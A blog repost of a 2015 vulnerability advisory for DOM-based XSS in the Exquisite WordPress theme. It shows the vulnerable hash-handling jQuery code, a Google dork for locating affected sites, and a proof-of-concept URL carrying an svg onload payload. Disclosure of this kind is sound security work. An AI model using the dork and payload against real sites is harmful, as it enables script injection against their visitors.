DOM Cross Site Scripting In Exquisite - Ultimate Newspaper WordPressTheme

Hello friends to day i am sharing my 0day Exploit in WordPress theme here is the Exploit.

http://packetstormsecurity.com/files/131657/wpultimatenewspaper-xss.txt




# Exploit Title: DOM Cross Site Scripting In Exquisite - Ultimate Newspaper
WordPressTheme
# Google Dork: inurl:/wp-content/themes/exquisite-wp/assets/
# Date: 24/04/2015
# Exploit Author: Osama Mahmood (M4rkm3n)
# Vendor Homepage:
http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019
# Software Link:
http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019
# Tested on: Windows 8/7

Hello friend,

Today i am filling this vulnerability which i found in the WordPress theme
(Exquisite - Ultimate Newspaper) DOM XSS
The vulnerability was caused by the issue is at line 83 of
exquisite-wp/assets/js/jquery.foundation.plugins.js

Vulnerable Code :-

 });

    if (window.location.hash) {
      activateTab($('a[href="' + window.location.hash +
'"]').parent('dd'));
      settings.callback();
    }

  };

and it was causing DOM XSS.

[-] Proof Of Concept:
URL:
http://localhost/x/wordpress/wp-content/themes/exquisite-wp/assets/
http://localhost/x/wordpress/#<svg/onload=prompt(document.domain)>
[-] Fix / Solution:
Update to latest framework.
[-] Reported:
Was reported to the Developers on 26/04/2015

My Profile :-
https://www.facebook.com/th3.m4rkm3n.007
https://twitter.com/OsamaMahmood007
https://www.linkedin.com/in/osamamahmood007

Share on Google Plus

Unknown

About Unknown

Hi , This is Osama Mahmood and i will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. follow me on twitter @OsamaMahmood007